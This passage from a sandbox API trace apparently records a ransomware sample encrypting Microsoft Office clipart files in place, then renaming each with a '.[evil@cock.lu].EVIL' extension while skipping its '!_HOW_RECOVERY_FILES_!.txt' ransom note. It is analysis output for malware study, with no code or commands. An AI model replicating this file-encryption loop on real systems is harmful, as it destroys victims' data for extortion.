lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x39f8, lpOverlapped=0x0) returned 1 [0165.331] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.331] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.331] _errno () returned 0x84b1160840 [0165.331] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.331] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a00, lpOverlapped=0x0) returned 1 [0165.331] CloseHandle (hObject=0x1a8) returned 1 [0165.331] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.332] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.332] __uncaught_exception () returned 0x84b1160800 [0165.332] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.332] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf.[evil@cock.lu].evil")) returned 1 [0165.333] ??_V@YAXPEAX@Z () returned 0x1 [0165.337] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF", dwFileAttributes=0x200) returned 0 [0165.337] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.337] wcsstr (_Str="PE02950_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.337] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF") returned 69 [0165.337] wcscmp (_String1="PE02950_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.337] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02950_.WMF") returned 0x0 [0165.337] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF") returned 0x45 [0165.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.340] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d2a, lpOverlapped=0x0) returned 1 [0165.350] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.350] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.350] _errno () returned 0x84b1160840 [0165.350] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.350] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d40, lpOverlapped=0x0) returned 1 [0165.350] CloseHandle (hObject=0x1a8) returned 1 [0165.350] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.351] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.351] __uncaught_exception () returned 0x84b1160800 [0165.351] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.351] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf.[evil@cock.lu].evil")) returned 1 [0165.352] ??_V@YAXPEAX@Z () returned 0x1 [0165.356] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF", dwFileAttributes=0x200) returned 0 [0165.356] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.356] wcsstr (_Str="PE02957_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.356] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF") returned 69 [0165.356] wcscmp (_String1="PE02957_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.356] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE02957_.WMF") returned 0x0 [0165.356] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF") returned 0x45 [0165.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.358] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc70, lpOverlapped=0x0) returned 1 [0165.368] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.368] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.368] _errno () returned 0x84b1160840 [0165.368] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.368] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc80, lpOverlapped=0x0) returned 1 [0165.369] CloseHandle (hObject=0x1a8) returned 1 [0165.369] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.369] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.369] __uncaught_exception () returned 0x84b1160800 [0165.369] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.369] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf.[evil@cock.lu].evil")) returned 1 [0165.370] ??_V@YAXPEAX@Z () returned 0x1 [0165.374] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF", dwFileAttributes=0x200) returned 0 [0165.374] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.374] wcsstr (_Str="PE03236_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.374] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF") returned 69 [0165.374] wcscmp (_String1="PE03236_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.374] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03236_.WMF") returned 0x0 [0165.374] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF") returned 0x45 [0165.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.377] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x614, lpOverlapped=0x0) returned 1 [0165.386] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.386] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0165.386] _errno () returned 0x84b1160840 [0165.386] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.386] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0165.386] CloseHandle (hObject=0x1a8) returned 1 [0165.386] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0165.386] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0165.386] __uncaught_exception () returned 0x84b1160800 [0165.386] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0165.387] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf.[evil@cock.lu].evil")) returned 1 [0165.388] ??_V@YAXPEAX@Z () returned 0x1 [0165.391] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF", dwFileAttributes=0x200) returned 0 [0165.391] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0165.391] wcsstr (_Str="PE03241_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0165.391] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF") returned 69 [0165.391] wcscmp (_String1="PE03241_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0165.391] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03241_.WMF") returned 0x0 [0165.391] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF") returned 0x45 [0165.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0165.394] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b4, lpOverlapped=0x0) returned 1 [0166.326] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.326] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.326] _errno () returned 0x84b1160840 [0166.326] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.326] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0166.326] CloseHandle (hObject=0x1a8) returned 1 [0166.326] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.327] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.327] __uncaught_exception () returned 0x84b1160800 [0166.327] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.327] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf.[evil@cock.lu].evil")) returned 1 [0166.328] ??_V@YAXPEAX@Z () returned 0x1 [0166.331] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF", dwFileAttributes=0x200) returned 0 [0166.332] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.332] wcsstr (_Str="PE03257_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.332] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF") returned 69 [0166.332] wcscmp (_String1="PE03257_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.332] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03257_.WMF") returned 0x0 [0166.332] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF") returned 0x45 [0166.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.334] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3380, lpOverlapped=0x0) returned 1 [0166.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.349] _errno () returned 0x84b1160840 [0166.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x33a0, lpOverlapped=0x0) returned 1 [0166.349] CloseHandle (hObject=0x1a8) returned 1 [0166.349] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.350] __uncaught_exception () returned 0x84b1160800 [0166.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.350] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf.[evil@cock.lu].evil")) returned 1 [0166.351] ??_V@YAXPEAX@Z () returned 0x1 [0166.355] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF", dwFileAttributes=0x200) returned 0 [0166.355] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.355] wcsstr (_Str="PE03331_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.355] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF") returned 69 [0166.355] wcscmp (_String1="PE03331_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.355] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03331_.WMF") returned 0x0 [0166.355] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF") returned 0x45 [0166.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.358] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x692, lpOverlapped=0x0) returned 1 [0166.372] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.372] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.372] _errno () returned 0x84b1160840 [0166.372] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.372] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6a0, lpOverlapped=0x0) returned 1 [0166.372] CloseHandle (hObject=0x1a8) returned 1 [0166.372] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.373] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.373] __uncaught_exception () returned 0x84b1160800 [0166.373] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.373] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf.[evil@cock.lu].evil")) returned 1 [0166.374] ??_V@YAXPEAX@Z () returned 0x1 [0166.378] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF", dwFileAttributes=0x200) returned 0 [0166.378] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.378] wcsstr (_Str="PE03339_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.378] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF") returned 69 [0166.378] wcscmp (_String1="PE03339_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.378] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03339_.WMF") returned 0x0 [0166.378] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF") returned 0x45 [0166.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.381] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x282c, lpOverlapped=0x0) returned 1 [0166.384] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.384] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.384] _errno () returned 0x84b1160840 [0166.384] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.384] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2840, lpOverlapped=0x0) returned 1 [0166.384] CloseHandle (hObject=0x1a8) returned 1 [0166.384] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.385] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.385] __uncaught_exception () returned 0x84b1160800 [0166.385] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.385] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf.[evil@cock.lu].evil")) returned 1 [0166.386] ??_V@YAXPEAX@Z () returned 0x1 [0166.389] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF", dwFileAttributes=0x200) returned 0 [0166.390] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.390] wcsstr (_Str="PE03451_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.390] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF") returned 69 [0166.390] wcscmp (_String1="PE03451_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.390] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03451_.WMF") returned 0x0 [0166.390] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF") returned 0x45 [0166.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.392] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2108, lpOverlapped=0x0) returned 1 [0166.444] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.444] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.444] _errno () returned 0x84b1160840 [0166.444] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, 